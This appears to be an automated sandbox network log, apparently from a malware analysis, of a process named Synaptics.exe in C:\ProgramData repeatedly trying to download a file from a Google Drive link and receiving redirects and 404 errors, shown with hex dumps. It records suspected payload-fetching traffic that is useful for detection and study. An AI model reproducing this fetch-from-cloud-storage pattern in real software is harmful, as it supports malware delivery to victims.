                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:27 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-e93lAh9uJvvNt4t-NiTcMQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    68192.168.2.449852142.250.186.1294435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:27 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:28 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC78TJ0s7w9-xVrnPC4666qZhtzBpabA4vOB160H6JXYtU6Fdo4rnzdYpAuZ1VKsEXBN
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:27 GMT
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-3QCZBTHJd1WzjAiyJ7Ckhg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
                                                                                                                                                                    2024-12-30 03:59:28 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                    2024-12-30 03:59:28 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4e 57 6a 55 4b 4a 34 5f 54 4f 6f 57 67 34 73 4d 68 6c 32 5a 2d 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                                    Data Ascii: t Found)!!1</title><style nonce="NWjUKJ4_TOoWg4sMhl2Z-Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                    2024-12-30 03:59:28 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    69192.168.2.449850142.250.186.1294435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:27 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:28 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC7u95LCBikf2VrlPZgsV-yI6nxuqMn2Ojd7VJ5HUViP0ZCF2RixzeZv0yho1ewOmz7H
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:27 GMT
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-z7XQUqKBFeWkyxMcf_-bXQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
                                                                                                                                                                    2024-12-30 03:59:28 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                    2024-12-30 03:59:28 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 50 36 71 39 75 58 67 6e 48 35 4f 42 46 5a 4e 41 31 49 77 69 6f 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                                    Data Ascii: t Found)!!1</title><style nonce="P6q9uXgnH5OBFZNA1IwioA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                    2024-12-30 03:59:28 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    70192.168.2.449855142.250.181.2384435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:28 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:29 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:28 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-P1Fz65zWOE-ud9pl_6CLow' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    71192.168.2.449854142.250.181.2384435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:28 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:29 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:29 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-RIe_VXwCtSriN_ZweBl1SQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    72192.168.2.449857142.250.186.1294435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:28 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:29 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC4aikY1hqp2JJwd_UVjRDghR_eADDFrb1kjxIdoXxulk6H0qKleGVRTUJNzv2Grlb4iH4J0CYE
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:29 GMT
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-wcZe5jZLEzFE417kITNx4A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
                                                                                                                                                                    2024-12-30 03:59:29 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                                    2024-12-30 03:59:29 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4d 43 53 67 34 75 4e 75 77 6e 72 72 45 31 55 68 70 4f 56 5f 62 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                                    Data Ascii: 404 (Not Found)!!1</title><style nonce="MCSg4uNuwnrrE1UhpOV_bA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                                    2024-12-30 03:59:29 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                    Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    73192.168.2.449856142.250.186.1294435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:28 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:29 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC6crF2b7FSSTausPhad_4aDlZpOp8Brm48BUTsUxCBmURGshwiTp9F1tflMuoY3Q8yL
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:29 GMT
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-LvSAwuG9HlrbjnO4JLmlYw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
                                                                                                                                                                    2024-12-30 03:59:29 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
